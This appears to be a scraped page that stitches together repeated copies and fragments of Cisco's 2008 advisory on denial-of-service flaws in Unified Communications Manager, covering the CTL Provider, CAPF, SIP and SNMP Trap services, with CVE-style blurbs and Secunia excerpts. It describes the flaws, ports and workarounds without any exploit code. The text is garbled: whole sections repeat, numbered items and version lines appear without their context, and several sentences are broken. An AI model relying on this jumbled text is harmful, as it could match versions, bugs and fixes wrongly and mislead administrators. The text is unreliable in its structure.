Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsk46770 - CAPF crash with network traffic CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsi48115 - CM 6.1 stops providing service when receiving malformed Join sip-header CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsk46944 - CCM service restarts on receiving a valid SIP Packet CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsl22355 - CCM does not validate SIP URL input properly CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsj24113 - CCM Process Coredump/Restart During ISIC Execution Against Port 61441 CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of the vulnerabilities in this advisory may result in the interruption of voice services. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. It can downloaded at the following link: http://www.cisco.com/pcgi-bin/tablebuild.pl/callmgr-61?psrtdcat20e2 Workarounds =========== CTL Provider Related Vulnerabilities To mitigate against the CTL Provider service vulnerabilities (CSCsj80609 and CSCsi98433), system administrators can disable the CTL Provider service if it is not needed. The CTL Provider service is controlled via the Cisco CTL Provider menu selection. It is possible to mitigate the CTL Provider vulnerabilities by implementing filtering on screening devices. Note: It is possible to change the default port of the CTL Provider service (TCP port 2444). If changed, filtering should be based on the values used. CAPF Related Vulnerability To mitigate against the CAPF service vulnerability (CSCsk46770), system administrators can disable the CAPF service if it is not needed. If phones are not configured to use certificates, then the CAPF service can be disabled. The CAPF service is controlled by the Cisco Certificate Authority Proxy Function menu selection. It is possible to mitigate the CAPF vulnerability by implementing filtering on screening devices. If the CAPF service is enabled, permit access to TCP port 3804 only from networks that contain IP phone devices needing to utilize the CAPF service. SIP-Related Vulnerabilities It is possible to mitigate the SIP vulnerabilities by implementing filtering on screening devices. SNMP Trap-Related Vulnerability To mitigate against the SNMP Trap service vulnerability (CSCsj24113), system administrators can disable the SNMP Trap service. To disable the Windows SNMP service, navigate to Start > Programs > Administrative Tools > Services, and stop the SNMP Service. Note: The SNMP Trap Service listed in the Windows Service configuration screen is not applicable to this vulnerability and disabling it does not provide any benefit as a workaround for this vulnerability. For Cisco Unified Communications Manager 5.x and 6.x systems, the SNMP Trap service is controlled via the Cisco CallManager SNMP Service selection on the Control Center Feature Services screen. It is possible to mitigate the SNMP Trap service vulnerability by implementing filtering on screening devices. Permit access to UDP port 61441 only from management systems that need access to the SNMP Trap service. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. ustomers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http:/ www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml. Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. These vulnerabilities were discovered internally by Cisco. Status of this Notice: FINAL THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-teams@first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +---------------------------------------+ | Revision | | Initial | | 1.0 | 2008-May-14 | public | | | | release | +---------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt. -----BEGIN PGP SIGNATURE----- iD8DBQFIKw3c86n/Gc8U/uARAo4iAJ461QSdwp9yXivfv/yWe4Xlj2wNaACcD/nW GpnghuWFfH2gIjp6Yk6857c= =L6xn -----END PGP SIGNATURE-----

Memory leak in the Certificate Trust List (CTL) Provider service in Cisco Unified Communications Manager (CUCM) 5.x before 5.1(3) and 6.x before 6.1(1) allows remote attackers to cause a denial of service (memory consumption and service interruption) via a series of malformed TCP packets, aka Bug ID CSCsi98433. The problem is Bug ID : CSCsi98433 It is a problem.Please refer to the “Overview” for the impact of this vulnerability. These issues affect the following components: Certificate Trust List (CTL) Provider Certificate Authority Proxy Function (CAPF) Session Initiation Protocol (SIP) Simple Network Management Protocol (SNMP) Trap An attacker can exploit these issues to cause denial-of-service conditions in the affected application. ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. This vulnerability is reported in version 5.x. 2) Another error within the CTL Provider service can be exploited to consume large amounts of memory resources via a series of specially crafted packets sent to default port 2444/TCP. This vulnerability is reported in versions 5.x and 6.x. This vulnerability is reported in versions 4.1, 4.2, and 4.3. This vulnerability is reported in versions 5.x and 6.x. This vulnerability is reported in versions 4.1, 4.2, 4.3, 5.x, and 6.x. SOLUTION: Update to the fixed versions. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. These vulnerabilities were discovered internally by Cisco. Workarounds that mitigate some of these vulnerabilities are available. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml. The software version can also be determined by running the command show version active via the command line interface (CLI). No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= Cisco Unified Communications Manager is the call processing component of the Cisco IP Telephony solution that extends enterprise telephony features and functions to packet telephony network devices, such as IP phones, media processing devices, voice-over-IP (VoIP) gateways, and multimedia applications. The CTL Provider service listens by default on TCP port 2444 and is user configurable. The CTL Provider service is enabled by default. There is a workaround for this vulnerability. The CTL Provider service listens by default on TCP port 2444 and is user configurable. There is a workaround for this vulnerability. The CAPF service listens by default on TCP port 3804 and is user configurable. The CAPF service is disabled by default. There is a workaround for this vulnerability. There is no workaround for this vulnerability. There is no workaround for this vulnerability. There is no workaround for this vulnerability. The SNMP Trap Agent service listens by default on UDP port 61441. There is a workaround for this vulnerability. Vulnerability Scoring Details ============================= Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss * CSCsj80609 - Memory Leak Due to TCPFUZZ on Port 2444 (CTLProvider) CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsi98433 - CTLProvider leaks memory in certain scenarios CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsk46770 - CAPF crash with network traffic CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsi48115 - CM 6.1 stops providing service when receiving malformed Join sip-header CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsk46944 - CCM service restarts on receiving a valid SIP Packet CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsl22355 - CCM does not validate SIP URL input properly CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsj24113 - CCM Process Coredump/Restart During ISIC Execution Against Port 61441 CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of the vulnerabilities in this advisory may result in the interruption of voice services. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. The CTL Provider service is controlled via the Cisco CTL Provider menu selection. It is possible to mitigate the CTL Provider vulnerabilities by implementing filtering on screening devices. Note: It is possible to change the default port of the CTL Provider service (TCP port 2444). If changed, filtering should be based on the values used. CAPF Related Vulnerability To mitigate against the CAPF service vulnerability (CSCsk46770), system administrators can disable the CAPF service if it is not needed. If phones are not configured to use certificates, then the CAPF service can be disabled. The CAPF service is controlled by the Cisco Certificate Authority Proxy Function menu selection. It is possible to mitigate the CAPF vulnerability by implementing filtering on screening devices. If the CAPF service is enabled, permit access to TCP port 3804 only from networks that contain IP phone devices needing to utilize the CAPF service. SIP-Related Vulnerabilities It is possible to mitigate the SIP vulnerabilities by implementing filtering on screening devices. SNMP Trap-Related Vulnerability To mitigate against the SNMP Trap service vulnerability (CSCsj24113), system administrators can disable the SNMP Trap service. To disable the Windows SNMP service, navigate to Start > Programs > Administrative Tools > Services, and stop the SNMP Service. Note: The SNMP Trap Service listed in the Windows Service configuration screen is not applicable to this vulnerability and disabling it does not provide any benefit as a workaround for this vulnerability. It is possible to mitigate the SNMP Trap service vulnerability by implementing filtering on screening devices. Permit access to UDP port 61441 only from management systems that need access to the SNMP Trap service. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. ustomers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http:/ www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml. Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. These vulnerabilities were discovered internally by Cisco. Status of this Notice: FINAL THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-teams@first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +---------------------------------------+ | Revision | | Initial | | 1.0 | 2008-May-14 | public | | | | release | +---------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt. -----BEGIN PGP SIGNATURE----- iD8DBQFIKw3c86n/Gc8U/uARAo4iAJ461QSdwp9yXivfv/yWe4Xlj2wNaACcD/nW GpnghuWFfH2gIjp6Yk6857c= =L6xn -----END PGP SIGNATURE-----

The Certificate Authority Proxy Function (CAPF) service in Cisco Unified Communications Manager (CUCM) 4.1 before 4.1(3)SR7, 4.2 before 4.2(3)SR4, and 4.3 before 4.3(2) allows remote attackers to cause a denial of service (service crash) via malformed network traffic, aka Bug ID CSCsk46770. Cisco Unified Communications Manager (CUCM) There is a service disruption (DoS) Vulnerabilities exist. The problem is Bug ID : CSCsk46770 It is a problem.Please refer to the “Overview” for the impact of this vulnerability. These issues affect the following components: Certificate Trust List (CTL) Provider Certificate Authority Proxy Function (CAPF) Session Initiation Protocol (SIP) Simple Network Management Protocol (SNMP) Trap An attacker can exploit these issues to cause denial-of-service conditions in the affected application. ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. This vulnerability is reported in version 5.x. 2) Another error within the CTL Provider service can be exploited to consume large amounts of memory resources via a series of specially crafted packets sent to default port 2444/TCP. This vulnerability is reported in versions 5.x and 6.x. This vulnerability is reported in versions 4.1, 4.2, and 4.3. This vulnerability is reported in versions 5.x and 6.x. This vulnerability is reported in versions 4.1, 4.2, 4.3, 5.x, and 6.x. SOLUTION: Update to the fixed versions. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. These vulnerabilities were discovered internally by Cisco. Workarounds that mitigate some of these vulnerabilities are available. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml. The software version can also be determined by running the command show version active via the command line interface (CLI). No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= Cisco Unified Communications Manager is the call processing component of the Cisco IP Telephony solution that extends enterprise telephony features and functions to packet telephony network devices, such as IP phones, media processing devices, voice-over-IP (VoIP) gateways, and multimedia applications. The CTL Provider service listens by default on TCP port 2444 and is user configurable. The CTL Provider service is enabled by default. There is a workaround for this vulnerability. The CTL Provider service listens by default on TCP port 2444 and is user configurable. There is a workaround for this vulnerability. The CAPF service listens by default on TCP port 3804 and is user configurable. The CAPF service is disabled by default. There is a workaround for this vulnerability. There is no workaround for this vulnerability. There is no workaround for this vulnerability. There is no workaround for this vulnerability. The SNMP Trap Agent service listens by default on UDP port 61441. There is a workaround for this vulnerability. Vulnerability Scoring Details ============================= Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss * CSCsj80609 - Memory Leak Due to TCPFUZZ on Port 2444 (CTLProvider) CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsi98433 - CTLProvider leaks memory in certain scenarios CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsk46770 - CAPF crash with network traffic CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsi48115 - CM 6.1 stops providing service when receiving malformed Join sip-header CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsk46944 - CCM service restarts on receiving a valid SIP Packet CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsl22355 - CCM does not validate SIP URL input properly CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsj24113 - CCM Process Coredump/Restart During ISIC Execution Against Port 61441 CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of the vulnerabilities in this advisory may result in the interruption of voice services. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. It can downloaded at the following link: http://www.cisco.com/pcgi-bin/tablebuild.pl/callmgr-61?psrtdcat20e2 Workarounds =========== CTL Provider Related Vulnerabilities To mitigate against the CTL Provider service vulnerabilities (CSCsj80609 and CSCsi98433), system administrators can disable the CTL Provider service if it is not needed. The CTL Provider service is controlled via the Cisco CTL Provider menu selection. It is possible to mitigate the CTL Provider vulnerabilities by implementing filtering on screening devices. If the CTL Provider service is enabled, permit access to TCP port 2444 only between the Cisco Unified Communications Manager systems where the CTL Provider service is active and the CTL Client, usually on the administrator's workstation, to mitigate the CTL Provider service overflow. Note: It is possible to change the default port of the CTL Provider service (TCP port 2444). If changed, filtering should be based on the values used. CAPF Related Vulnerability To mitigate against the CAPF service vulnerability (CSCsk46770), system administrators can disable the CAPF service if it is not needed. If phones are not configured to use certificates, then the CAPF service can be disabled. It is possible to mitigate the CAPF vulnerability by implementing filtering on screening devices. If the CAPF service is enabled, permit access to TCP port 3804 only from networks that contain IP phone devices needing to utilize the CAPF service. SIP-Related Vulnerabilities It is possible to mitigate the SIP vulnerabilities by implementing filtering on screening devices. SNMP Trap-Related Vulnerability To mitigate against the SNMP Trap service vulnerability (CSCsj24113), system administrators can disable the SNMP Trap service. To disable the Windows SNMP service, navigate to Start > Programs > Administrative Tools > Services, and stop the SNMP Service. Note: The SNMP Trap Service listed in the Windows Service configuration screen is not applicable to this vulnerability and disabling it does not provide any benefit as a workaround for this vulnerability. It is possible to mitigate the SNMP Trap service vulnerability by implementing filtering on screening devices. Permit access to UDP port 61441 only from management systems that need access to the SNMP Trap service. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. ustomers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http:/ www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml. Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. These vulnerabilities were discovered internally by Cisco. Status of this Notice: FINAL THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-teams@first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +---------------------------------------+ | Revision | | Initial | | 1.0 | 2008-May-14 | public | | | | release | +---------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt. -----BEGIN PGP SIGNATURE----- iD8DBQFIKw3c86n/Gc8U/uARAo4iAJ461QSdwp9yXivfv/yWe4Xlj2wNaACcD/nW GpnghuWFfH2gIjp6Yk6857c= =L6xn -----END PGP SIGNATURE-----

